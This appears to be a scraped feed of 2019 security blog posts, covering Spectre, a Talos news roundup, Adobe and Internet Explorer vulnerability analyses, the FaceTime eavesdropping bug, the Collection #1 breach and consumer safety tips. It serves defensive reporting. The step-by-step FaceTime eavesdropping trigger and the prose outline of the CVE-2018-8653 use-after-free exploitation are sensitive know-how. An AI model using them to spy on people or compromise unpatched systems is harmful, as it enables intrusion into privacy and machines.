The post Vulnerabilities in Two Smart Car Alarm Systems Affected 3M Vehicles appeared first on The State of Security.

Smashing Security #118: The ‘s’ in IoT stands for security

Smashing Security #118: The 's' in IoT stands for security

Twerking robot assistants, an app from Saudi Arabia that lets men track women, and a gnarly skiing security snarl-up!

All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by technology journalist Geoff White.

New Google Chrome Zero-Day Vulnerability Found Actively Exploited in the Wild

You must update your Google Chrome immediately to the latest version of the web browsing application. Security researcher Clement Lecigne of Google's Threat Analysis Group discovered and reported a high severity vulnerability in Chrome late last month that could allow remote attackers to execute arbitrary code and take full control of the computers. The vulnerability, assigned as

Five Easy Steps to Keep on Your Organization’s DevOps Security Checklist

The discovery of a significant container-based (runc) exploit sent shudders across the Internet. Exploitation of CVE-2019-5736 can be achieved with “minimal user interaction”; it subsequently allows attackers to gain root-level code execution on the host. Scary, to be sure. Scarier, however, is that the minimal user interaction was made easier by failure to follow a […]… Read More

The post Five Easy Steps to Keep on Your Organization’s DevOps Security Checklist appeared first on The State of Security.

Tripwire Patch Priority Index for February 2019

Tripwire’s February 2019 Patch Priority Index (PPI) brings together the top vulnerabilities from Microsoft and Adobe. First on the patch priority list this month are patches for Microsoft’s Browser and Scripting Engine. These patches resolve 23 vulnerabilities, including fixes for Memory Corruption, Elevation of Privilege, Spoofing, Security Feature Bypass and Information Disclosure vulnerabilities. Next on […]… Read More

The post Tripwire Patch Priority Index for February 2019 appeared first on The State of Security.

Spectre, Google, and the Universal Read Gadget

Spectre, a seemingly never ending menace to processors, is back in the limelight once again thanks to the Universal Read Gadget. First seen at the start of 2018, Spectre emerged alongside Meltdown as a major potential threat to people’s system security.

Meltdown and Spectre

Meltdown targeted Intel processors and required a malicious process running on the system to interact with it. Spectre could be launched from browsers via a script. As these threats were targeting hardware flaws in the CPU, they were difficult to address and required BIOS updates and some other things to ensure a safe online experience. As per our original blog:

The core issue stems from a design flaw that allows attackers access to memory contents from any device, be it desktop, smart phone, or cloud server, exposing passwords and other sensitive data. The flaw in question is tied to what is called speculative execution, which happens when a processor guesses the next operations to perform based on previously cached iterations.

The Meltdown variant only impacts Intel CPUs, whereas the second set of Spectre variants impacts all vendors of CPUs with support of speculative execution. This includes most CPUs produced during the last 15 years from Intel, AMD, ARM, and IBM.

This is not a great situation for everyone to suddenly find themselves in. Manufacturers were caught on the backfoot and customers rightly demanded a solution.

If this is the part where you’re thinking, “What caused this again?” then you’re in luck.

Speculative patching woes

The issues came from something called “speculative execution.” As we said in this follow up blog about patching difficulties:

Speculative execution is an effective optimization technique used by most modern processors to determine where code is likely to go next. Hence, when it encounters a conditional branch instruction, the processor makes a guess for which branch might be executed based on the previous branches’ processing history. It then speculatively executes instructions until the original condition is known to be true or false. If the latter, the pending instructions are abandoned, and the processor reloads its state based on what it determines to be the correct execution path.

The issue with this behaviour and the way it’s currently implemented in numerous chips is that when the processor makes a wrong guess, it has already speculatively executed a few instructions. These are saved in cache, even if they are from the invalid branch. Spectre and Meltdown take advantage of this situation by comparing the loading time of two variables, determining if one has been loaded during the speculative execution, and deducing its value.

Four variants existed across Spectre and Meltdown, with Intel, IBM, ARM, and AMD being snagged by Spectre and “just” Intel being caught up by Meltdown.

The vulnerabilities impacting CPUs (central processing units) made it a tricky thing to fix. Software alterations could cause performance snags, and hardware fixes could be even more complicated. A working group was formed to try and thrash out the incredibly complicated details of how this issue would be tackled.

In January 2018, researchers stressed the only real way to solve Spectre was redesigning computer hardware from the ground up. This is no easy task. Replace everything, or suffer the possible performance hit from any software fixes. Fairly complex patching nightmares abound, with operating systems, pre/post Skylake CPUs, and more needing tweaks or wholesale changes.

Additional complications

It wasn’t long before scams started capitalising on the rush to patch. Now people suddenly had to deal with unrelated fakes, malware, and phishes on top of actual Meltdown/Spectre threats.

Alongside the previously mentioned scams, fake websites started to pop up, too. Typically they claimed to be an official government portals, or plain old download sites offering up a fix. They might also make use of SSL, because displaying a padlock is now a common trick of phishers. That’s a false sense of security—just because there’s a padlock, doesn’t mean it’s a safe site. All it means is the data on it is encrypted. Beyond that, you’re on your own.

The site in our example offered up a zipfile. Contained within was SmokeLoader, well known for attempting to grab additional malicious downloads.

SmokeLoader

Click to enlarge

Eventually, the furore died down and people slowly forgot about Spectre. It’d pop up again in occasional news articles, but for the most part, people treated it as out of sight, out of mind.

Which brings us to last week’s news.

Spectre: What happened now?

What happened now is a reiteration of the “it’s not safe yet” message. The threat is mostly the same, and a lot of people may not need to worry about this. However, as The Register notes, the problem hasn’t gone away and some developers will need to keep it in mind.

Google has released a paper titled, unsurprisingly enough, “Spectre is here to stay: An analysis of side-channels and speculative execution.”

The Google paper

First thing’s first: It’s complicated, and you can read the full paper [PDF] here.

There’s a lot of moving parts to this, and frankly nobody should be expected to understand everything in it unless they’re working in or around this in some capacity. Some of this has already been mentioned, but it’s already about 700 words or so ago so a short recap may be handy:

  1. Side channels are bad. Your computer may be doing a bunch of secure tasks, keeping your data safe. All those bits and pieces of hardware, however, are doing all sorts of things to make those secure processes happen. Side channel attacks come at the otherwise secure data from another angle, in the realm of the mechanical. Sound, power consumption, timing between events, electromagnetic leaks, cameras, and more. All of these provide a means for a clever attacker to exploit this leaky side channel and grab data you’d rather they didn’t.
  2. They do this in Spectre’s case by exploiting speculative execution. Modern processors are big fans of speculative execution, given they make use of it extensively. It helps improve performance, by making guesses about what programs will do next and then abandoning if it turns out that doesn’t happen after all. Conversely, the retained paths are deployed and everything gets a nice speed boost. Those future potential possibilities is where Spectre comes in.
  3. As the paper says, “computations that should never have happened…allow for information to be leaked” via Spectre. It allows the attacker to inject “dangerously speculative behaviour” into trusted code, or untrusted code typically subjected to safety checks. Both are done through triggering “ordinarily impossible computations” through specific manipulations of the processor’s shared micro-architectural states.

Everything is a bit speed versus security, and security lost out. The manufacturers realised too late that the speed/security tradeoff came with a hefty security price the moment Spectre arrived on the scene. Thinking bad actors couldn’t tamper with with speculative executions—or worse, not considering this in the first place—has turned out to be a bit of a disaster.

The paper goes on to list that Intel, ARM, AMD, MIPS, IBM, and Oracle have all reported being affected. It’s also clear that:

Our paper shows these leaks are not only design flaws, but are in fact foundational, at the very base of theoretical computation.

This isn’t great. Nor is the fact that they estimate it’s probably more widely distributed than any security flaw in history, affecting “billions of CPUs in production across all device classes.”

Spectre: no exorcism due

The research paper asserts that Spectre is going to be around for a long time. Software-based techniques to ward off the threat will never quite remove the issue. They may ward off the threat but add a performance cost, with more layers of defence potentially making things too much of a drag to consider them beneficial.

The fixes end up being a mixed bag of trade-offs and performance hits, and Spectre is so variable and evasive that it quickly becomes impossible to pin down a 100 percent satisfactory solution. At this point, Google’s “Universal Read Gadget” wades in and makes everything worse.

What is the Universal Read Gadget?

A way to read data without permission that is for all intents and purposes unstoppable. When multiple vulnerabilities in current languages run on the CPU, it allows construction of said read gadget and that’s the real meat of Google’s research. Nobody is going to ditch speculative execution anytime soon, and nobody is going to magically come up with a way to solve the side channel issue, much less something like a Universal Read Gadget.

As the paper states,

We now believe that speculative vulnerabilities on today’s hardware defeat all language-enforced confidentiality with no known comprehensive software mitigations…as we have discovered that untrusted code can construct a universal read gadget to read all memory in the same address space through side-channels.

On the other hand, it’s clear we shouldn’t start panicking. It sounds bad, and it is bad, but it’s unlikely anyone is exploiting you using these techniques. Of course, unlikely doesn’t mean unfeasible, and this is why hardware and software organisations continue to wrestle with this particular genie.

The research paper stresses that the URG is very difficult to pull off.

The universal read gadget is not necessarily a straightforward construction. It requires detailed knowledge of the μ-architectural characteristics of the CPU and knowledge of the language implementation, whether that be a static compiler or a virtual machine. Additionally, the gadget might have particularly unusual performance and concurrency characteristics

Numerous scenarios will require different approaches, and it lists multiple instances where the gadget will potentially fail. In short, nobody is going to come along and Universal Read Gadget your computer. For now, much of this is at the theoretical stage. That doesn’t mean tech giants are becoming complacent however, and hardware and software organisations have a long road ahead to finally lay this spectre to rest.

The post Spectre, Google, and the Universal Read Gadget appeared first on Malwarebytes Labs.

Cyber Security Week in Review (March 1)


Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

Top headlines this week


  • Drupal patched a “highly critical” vulnerability that attackers exploited to deliver cryptocurrency miners and other malware. Some field types in the content management system did not properly sanitize data from non-form sources, which allowed an attacker to execute arbitrary PHP code. Users need to update to the latest version of Drupal to patch the bug. Snort rule 49257 also protects users from this vulnerability.
  • Cryptocurrency mining tool Coinhive says it’s shutting down, but not due to malicious use. Attackers have exploited the tool for months as part of malware campaigns, stealing computing power from users to mine cryptocurrencies. However, the company behind the miner says it’s shutting down because it’s no longer economically viable to run. Snort rules 44692, 44693, 45949 - 45952, 46365 - 46367, 46393, 46394 and 47253 can protect you against the use of Coinhive. 
  • Several popular apps unknowingly share users’ personal information with Facebook. In many cases, this can include personal health information, including females’ menstruation cycle, users’ heart rate and recent home buying purchases. The data is sent to Facebook even if the user doesn’t have a Facebook profile. 

From Talos


  • Attackers are increasingly going after unsecured Elasticsearch clusters. These attackers are targeting clusters using versions 1.4.2 and lower, and are leveraging old vulnerabilities to pass scripts to search queries and drop the attacker's payloads. These scripts are being leveraged to drop both malware and cryptocurrency miners on victim machines.
  • The latest Beers with Talos podcast covers the importance of privacy. Special guest Michelle Dennedy, Cisco’s chief privacy officer, talks about recent initiatives the company is taking on and how other organizations can do better. 

Vulnerability roundup


  • A flaw in the Ring doorbell could allow an attacker to spy on users’ homes and even inject falsified video. The vulnerability could open the door for a man-in-the-middle attack against the smart doorbell app since the sound and video recorded by the doorbell is transmitted in plaintext. 
  • Cisco disclosed multiple vulnerabilities in a variety of its products, including severe bugs in routers. The company urged users of its firewall routers and VPN to patch immediately Thursday, warning against a remote code execution vulnerability. There’s also a certificate validation vulnerability in Cisco Prime Infrastructure that could allow an attacker to perform a man-in-the-middle attack against the SSL tunnel between Cisco’s Identity Service Engine and Prime Infrastructure. Snort rule 49240 protects users from the Prime Infrastructure vulnerability. 
  • New flaws in 4G and 5G could allow attackers to track users’ location and intercept phone calls. A new research paper discloses what is believed to be the first vulnerabilities that affect both broadband technologies. 

The rest of the news


  • A new service from Cisco Duo launched a new product recently to scan Google Chrome extensions. CRXcavator provides customers and users by scanning the Chrome store and then delivering reports on different extensions based on their permissions required and potential use of those permissions. 
  • Google is under fire for allegedly forgetting to inform users of a microphone inside of its Nest smart hub. While the company says it was never supposed to be a secret, users, security researchers and even politicians now are questioning why the microphone was installed in the first place. 
    • Talos Take: "To be clear, because some news outlets have reported this microphone as being present in the Nest THERMOSTAT.  It is NOT present in the thermostat, it’s present in the Smart Hub, which is the centerpiece of their home security solution," Joel Esler, senior manager, Communities Division.


New Flaws Re-Enable DMA Attacks On Wide Range of Modern Computers

Security researchers have discovered a new class of security vulnerabilities that impacts all major operating systems, including Microsoft Windows, Apple macOS, Linux, and FreeBSD, allowing attackers to bypass protection mechanisms introduced to defend against DMA attacks. Known for years, Direct memory access (DMA)-based attacks let an attacker compromise a targeted computer in a matter of

Vulnerability Spotlight: Adobe Acrobat Reader DC text field remote code execution vulnerability


Aleksandar Nikolic of Cisco Talos discovered this vulnerability.

Executive summary

Adobe Acrobat Reader DC contains a vulnerability that could allow an attacker to remotely execute code on the victim’s machine. If the attacker tricks the user into opening a specially crafted PDF with specific JavaScript, they could cause heap corruption. The user could also trigger this bug if they open a specially crafted email attachment.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Adobe to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Adobe Acrobat Reader DC text field value remote code execution vulnerability (TALOS-2018-0714)

Adobe Acrobat Reader supports embedded JavaScript in PDFs to allow for more user interaction. However, this gives the attacker the ability to precisely control memory layout, and it poses an additional attack surface. If the attacker tricks the user into opening a PDF with two specific lines of JavaScript code, it will trigger an incorrect integer size promotion, leading to heap corruption. It’s possible to corrupt the heap to the point that the attacker could arbitrarily execute code on the victim’s machine.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that Adobe Acrobat Reader DC 2019.8.20071 is impacted by this vulnerability.

Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48293, 48294

Apple Users: Here’s What to Do About the Major FaceTime Bug

FaceTime is a popular way for people of all ages to connect with long-distance loved ones. The feature permits Apple users to video chat with other device owners from essentially anywhere at any time. And now, a bug in the software takes that connection a step further – as it permits users calling via FaceTime to hear the audio coming from the recipient’s phone, even before they’ve accepted or denied the call.

Let’s start with how the eavesdropping bug actually works. First, a user would have to start a FaceTime video call with an iPhone contact and while the call is dialing, they must swipe up from the bottom of the screen and tap “Add Person.” Then, they can add their own phone number to the “Add Person” screen. From there, the user can start a group FaceTime call between themselves and the original person dialed, even if that person hasn’t accepted the call. What’s more – if the user presses the volume up or down, the victim’s front-face camera is exposed too.

This bug acts as a reminder that these days your smartphone is just as data rich as your computer. So, as we adopt new technology into our everyday lives, we all must consider how these emerging technology trends could create security risks if we don’t take steps to protect our data.

Therefore, it’s crucial all iOS users that are running iOS 12.1 or later take the right steps now to protect their device and their data. If you’re an Apple user affected by this bug, be sure to follow these helpful security steps:

  • Update, update, update. Speaking of fixes – patches for bugs are included in software updates that come from the provider. Therefore, make sure you always update your device as soon as one is available. Apple has already confirmed that a fix is underway as we speak.
  • Be sure to disable FaceTime in iOS settings now. Until this bug is fixed, it is best to just disable the feature entirely to be sure no one is listening in on you. When a fix does emerge from Apple, you can look into enabling the service again.
  • Apply additional security to your phone. Though the bug will hopefully be patched within the next software update, it doesn’t hurt to always cover your device with an extra layer of security. To protect your phone from any additional mobile threats coming its way, be sure to use a security solution such as McAfee Mobile Security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Apple Users: Here’s What to Do About the Major FaceTime Bug appeared first on McAfee Blogs.

The Collection #1 Data Breach: Insights and Tips on This Cyberthreat

As the cybersecurity landscape evolves to match new trends in technology, it’s important for consumers to prioritize the protection of their online presence. That means remaining aware of the internet’s more common cyberthreats, including malware, phishing, and data breaches, and how they could potentially affect you. And while most of us already know about the Equifax data breach, a new monster breach now has to become top of mind for us all. Say hello to Collection #1, a data set exposing 772,904,991 unique email addresses and over 21 million unique passwords.

Discovered by security researcher Troy Hunt, Collection #1 first appeared on the popular cloud service called MEGA. The Collection #1 folder held over 12,000 files that weigh in at over 87 gigabytes. When the storage site was taken down, the folder was then transferred to a public hacking site. What’s truly astonishing about this is that the data was not for sale; it was simply available for anyone to take.

You may be wondering, how was all this data collected? It appears that this data was comprised of a breach of breaches, aggregating over 2,000 leaked databases containing cracked passwords, in order to achieve maximum exposure. The sheer volume of this breach makes Collection #1 the second largest in size to Yahoo, and the largest public breach ever (given the data was openly exposed on the internet).

It appears that this data set is designed for use in credential-stuffing attacks, where cybercriminals will use email and password combinations to hack into consumers’ online accounts. The risks could be even greater for those who reuse credentials across multiple accounts. In order to help protect yourself from this threat, it’s vital that users act fast and use the following tips to help protect their data:

  • Use strong, unique passwords. In addition to making sure all of your passwords are strong and unique, never reuse passwords across multiple accounts. You can also enable a password manager to help keep track of your credentials.
  • Change your passwords. Even if it doesn’t appear that your data was breached, it’s better to err on the side of caution and change all of your passwords to better protect yourself.
  • Enable two-factor authentication. While a strong and unique password is a good first line of defense, enabling app-based two-factor authentication across your accounts will help your cause by providing an added layer of security.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post The Collection #1 Data Breach: Insights and Tips on This Cyberthreat appeared first on McAfee Blogs.

Frequent Fortnite Player? 4 Tips to Combat the New Attack on User Accounts

Epic Games’ Fortnite has risen in popularity rapidly since its debut, and cybercriminals have leveraged that popularity to enact a handful of malicious schemes. Unfortunately, these tricks are showing no signs of slowing, as researchers recently discovered a security flaw that allowed cybercriminals to take over a gamer’s Fortnite account through a malicious link. This attack specifically targeted users who used a third-party website to log in to their Fortnite accounts, such as Facebook, Google, or gaming providers like Microsoft, Nintendo, and Sony. But instead of trying to steal a gamer’s password like many of the hacks we’ve seen, this scheme targeted the special access token the third-party website exchanges with the game when a user logs in.

So, how exactly does this threat work? First, a cybercriminal sends a malicious phishing link to a Fortnite user. To increase the likelihood that a user will click on the link, the cybercriminal would send the link with an enticing message promising perks like free game credits. If the user clicked on the link, they would be redirected to the vulnerable login page. From here, Epic Games would make the request for the SSO (single sign-on) token from the third-party site, given SSO allows a user to leverage one set of login credentials across multiple accounts. This authentication token is usually sent to Fortnite over the back-end, removing the need for the user to remember a password to access the game. However, due to the unsecured login page, the user would be redirected to the attacker’s URL. This allows cybercriminals to intercept the user’s login token and take over their Fortnite account.

After acquiring a login token, a cybercriminal would gain access to a Fortnite user’s personal and financial details. Because Fortnite accounts have partial payment card numbers tied to them, a cybercriminal would be able to make in-game purchases and rack up a slew of charges on the victim’s card.

It’s important for players to understand the realities of gaming security in order to be more prepared for potential cyberthreats such as the Fortnite hack. According to McAfee research, the average gamer has experienced almost five cyberattacks, with 75% of PC gamers worried about the security of gaming. And while Epic Games has thankfully fixed this security flaw, there are a number of techniques players can use to help safeguard their gaming security now and in the future:

  • Go straight to the source70% of breaches start with a phishing email. And phishing scams can be stopped by simply avoiding the email and going straight to the source to be sure you’re working with the real deal. In the case of this particular scheme, you should be able to check your account status on the Fortnite website and determine the legitimacy of the request from there.
  • Use a strong, unique password. If you think your Fortnite account was hacked, err on the side of caution by updating your login credentials. In addition, don’t reuse passwords over multiple accounts. Reusing passwords could allow a cybercriminal to access multiple of your accounts by just hacking into one of them.
  • Stay on top of your financial transactions. Check your bank statements regularly to monitor the activity of the card linked to your Fortnite account. If you see repeat or multiple transactions from your account, or see charges that you don’t recognize, alert your bank to ensure that your funds are protected.
  • Get protection specifically designed for gamers. We’re currently building McAfee Gamer Security to help boost your PC’s performance, while simultaneously safeguarding you from a variety of threats that can disrupt your gaming experience.

And, as always, stay on top of the latest consumer and mobile security threats by following @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Frequent Fortnite Player? 4 Tips to Combat the New Attack on User Accounts appeared first on McAfee Blogs.

IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653

Microsoft recently patched a critical flaw in Internet Explorer’s scripting engine that could lead to remote code execution. The vulnerability is being exploited in the wild and was originally reported by a researcher from Google’s Threat Analysis Group. Microsoft released an out-of-band patch to fix the vulnerability before the normal patch cycle. McAfee products received an update to detect the threat shortly after the patch was released.

A remote attacker can target Internet Explorer Versions 9 through 11 via a specially crafted website, while a local attacker on a rogue network could also target the Web Proxy Auto-Discovery service, which uses the same vulnerable scripting engine (jscript.dll). Microsoft Edge is not affected; however, other Windows applications that include the scripting engine might be vulnerable until the security patch from Microsoft is applied.

Context

Vulnerabilities targeting Internet Explorer that can be triggered either remotely or locally are prime tools for cybercriminals to compromise many unpatched computers. That is why criminals usually integrate those vulnerabilities into exploit kits, which propagate malware or conduct other nefarious activities against compromised hosts. The threat of exploit kits is one reason to track this type of vulnerability and to ensure all security patches are deployed in a timely manner. In 2018, more than 100 memory corruption vulnerabilities were found in a Microsoft scripting engine (either for Internet Explorer or Edge). See the MITRE website for more details. (For defense-in-depth, products such as McAfee Endpoint Security or McAfee Host Intrusion Prevention can detect and eradicate such threats until patches can be applied.)

Once a CVE ID is released, cybercriminals can take as little as a few weeks (or in some cases days) to integrate it into their exploit kit. For example, CVE-2018-8174 was initially reported to Microsoft in late April by two teams of threat researchers who had observed its exploitation in the wild. Microsoft published an advisory within a week, in early May. Meanwhile, the researchers published their security analysis of the exploit. Only two weeks later a proof-of-concept exploit was publicly released. In the next couple of weeks exploit kits RIG and Magnitude integrated their weaponized versions of the exploit. (A more detailed timeline can be found here.)

It took less than a month for cybercriminals to weaponize the vulnerability initially disclosed by Microsoft; therefore, it is critical to understand the threat posed by these attack vectors, and to ensure counter measures are in place to stop the threat before it can do any damage.

Technical details

The IE scripting engine jscript.dll is a code base that has been heavily audited:

It is no surprise that exploitable bugs are becoming more exotic. This is the case for CVE 2018-8653, which takes three seemingly innocent behaviors and turns them into a use-after-free flaw. A Microsoft-specific extension triggers a rarely explored code path that eventually misbehaves and invokes a frequently used function with unusual arguments. This leads to the use-after-free condition that was exploited in the wild.

The enumerator object: The entry point for this vulnerability is a Microsoft-specific extension, the enumerator object. It offers an API to enumerate opaque objects that belong to the Windows world (mostly ActiveX components, such as a file system descriptor used to list drives on a system). However, it can also be called on a JavaScript array. In this situation, one can access the array member as usual, but objects created this way are stored slightly differently in memory. This is the cause of interesting side effects.

The objects created by calling the Enumerator.prototype.item() function are recognized as an ActiveXObject and, as seen in the creation of eObj, we can under certain circumstances overwrite the “prototype” member that should have been a read-only property.

Unexpected side effect: The ability to overwrite the prototype member of an ActiveXObject can seem innocuous at first, but it can be leveraged to explore a code path that should not be reachable.

When using the “instanceof” keyword, we can see that the right side of the keyword expects a function. However, with a specially crafted object, the instanceof call succeeds and, worse, we can control the code being executed.

The edge case of invoking instanceof on a specially crafted ActiveXObject gives us the opportunity to run custom JavaScript code from a callback we control, which is typically an error-prone situation.

Attackers successfully turned this bug into a use-after-free condition, as we shall see next.

Exploiting the bug: Without getting into too much detail (see the proof of concept later in this document for more info), this bug can be turned into a “delete this” type of primitive, which resembles previously reported bugs.
When the callback function (“f” in our previous example) is invoked, the keyword “this” points to eObj.prototype. If we set it to null and then trigger a garbage collection, the memory backing the object can be freed and later reclaimed. However, as mentioned in the Project Zero bug report, to be successful an entire block of variables needs to be cleared before the memory is freed.

The out-of-band patch: Microsoft released an unscheduled patch to fix this vulnerability. It is common practice for us to look at what changed before and after the patch. Interestingly, this patch changes the strict minimum number of bytes, while the version number of the DLL remains unchanged.

Using the popular diffing tool Diaphora, we compared the version of jscript.dll for Windows 10, x64-bit edition (feature version 1809).

We can see that only a few functions were modified. All but one point to array-related functions. Those were probably patches addressing CVE 2018-8631 (jscript!JsArrayFunctionHeapSort out-of-bounds write). The only one remaining that was substantially modified is NameTbl::InvokeInternal.

Diaphora provides us with a diff of the assembly code of the two versions of the function. In this instance, it is easier to compare the functions side by side in Ida Pro to see what has changed. A quick glance toward the end of the function shows the introduction of two calls to GCRoot::~GCRoot (the destructor of the object GCRoot).

Looking at the implementation of ~GCRoot, we see it is the same code as that inlined in that function created by the compiler in the older version of the DLL.

In the newer version of the DLL, this function is called twice; while in the unpatched version, the code was called only once (inlined by the compiler, hence the absence of a function call). In C++ parlance, ~GCRoot is the destructor of GCRoot, so we may want to find the constructor of GCRoot. An easy trick is to notice the magic offset 0x3D0 to see if this value is used anywhere else. We find it near the top of the same function (the unpatched version is on the left):

Diving into the nitty gritty of garbage collection for jscript.dll is beyond the scope of this post, so let’s make some assumptions. In C++/C#, GCRoot would usually design a template to keep track of references pointing to the object being used, so those do not have garbage collection. Here it looks as though we are saving stack addresses (aka local variables) into a list of GCRoot objects to tell the garbage collector not to collect the objects whose pointers are on those specific locations on the stack. In hindsight this makes sense; we were able to “delete this” because “this” was not tracked by the garbage collector, so now Microsoft makes sure to specifically add that stack variable to the tracked elements.

We can verify this hypothesis by tracing the code around an invocation of instanceof. It turns out that just before invoking our custom “isPrototypeOf” callback function, a call to NameTbl::GetVarThis stores a pointer in the newly “protected” stack variable and then invokes ScrFncObj::Call to execute our callback.

Looking at unexpected behavior in `instanceof`: Curious readers might wonder why it is possible to invoke instanceof on a custom object rather than on a function (as described previously). When instanceof is invoked in JavaScript, the CScriptRuntime::InstOf function is called behind the scene. Early on, the function distinguishes two cases. If the variable type is 0x81 (which seems to be a broad type for a JavaScript object on the heap), then it invokes a virtual function that returns true/false if the object can be called. On the other hand, if the type is not 0x81, a different path is followed; it tries to automatically resolve the prototype object and invoke isPrototypeOf.

The 0x81 path:

The not 0x81 path:

 

 

Proof of concept

Now that we have seen the ins and outs of the bug, let’s look at a simple proof of concept that exhibits the use-after-free behavior.

First, we set up a couple of arrays, so that everything that can be preallocated is allocated, and the heap is in a somewhat ready state for the use after free.

Then, we declare our custom callback and trigger the vulnerability:

For some reason, the objects array needs to be freed and garbage collected before the next step of the exploit. This could be due to some side effect of freeing the ActiveXObject. The memory is reclaimed when we assign “1” to the property reallocPropertyName. That variable is a magic string that will be copied over the recently freed memory to mimic legitimate variables. It is created as shown:

The 0x0003 is a variable type that tells us the following value is an integer and that 1337 is its value. The string needs to be long enough to trigger an allocation of the same or similar size as the memory block that was recently freed.

To summarize, JavaScript variables (here, the RegExp objects) are stored in a block; when all the variables from the block are freed, the block itself is freed. In the right circumstances, the newly allocated string can take the place of the recently freed block, and because “this” is still dangling in our callback, it can be used for some type confusion. (This is the method used by the attackers, but beyond the scope of this post.) In this example, the code will print 1337 instead of an empty RegExp.

McAfee coverage

Please refer to the McAfee product bulletin for full coverage updates. Here is a short summary of current product coverage as of this writing.

Endpoint products: Endpoint Security (ENS), ENS Adaptive Threat Protection (ENS-ATP), Host Intrusion Prevention (HIPS), VirusScan Enterprise (VSE), WSS.

  • ENS (10.2.0+) with Exploit Prevention
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • HIPS (8.0.0+)
    • Proactively covered by McAfee Generic Buffer Overflow Protection Signature ID 428
  • ENS (all versions) and WSS (all versions). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V3 DAT (3564)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a
  • VSE (8.8+). Coverage based on samples observed so far. This protection is expected to be expanded over the next few days as viable exploitation attempts are seen.
    • Minimum DAT: V2 DAT (9113)
    • Detection names: Exploit-CVE2018-8653 and Exploit-CVE2018-8653.a

Content summary

  • DATs: V2 DAT (9113), V3 DAT (3564)
  • Generic Buffer Overflow Protection Signature ID 428

MITRE score

The base score (CVSS v3.0) for this vulnerability is 7.5 (High) with an impact score of 5.9 and an exploitability score of 1.6.

Conclusion

CVE-2018-8653 targets multiple versions of Internet Explorer and other applications that rely on the same scripting engine. Attackers can execute arbitrary code on unpatched hosts from specifically crafted web pages or JavaScript files. Even though the bug was recently fixed by Microsoft, we can expect exploit kits to soon deploy a weaponized version of this critical vulnerability, leveraging it to target remaining unpatched systems. The technical analysis in this post should provide enough information for defenders to ensure their systems will withstand the threat and to know which primitives to look for as an entry point for the attack. McAfee security products can be leveraged to provide specific “virtual patching” for this threat until full software patches can be deployed, while current generic buffer overflow protection rules can be used to fingerprint exploit attempts against this and similar vulnerabilities.

The post IE Scripting Flaw Still a Threat to Unpatched Systems: Analyzing CVE-2018-8653 appeared first on McAfee Blogs.

8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Choose a password that is unhackable rather than one that is super easy to remember.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

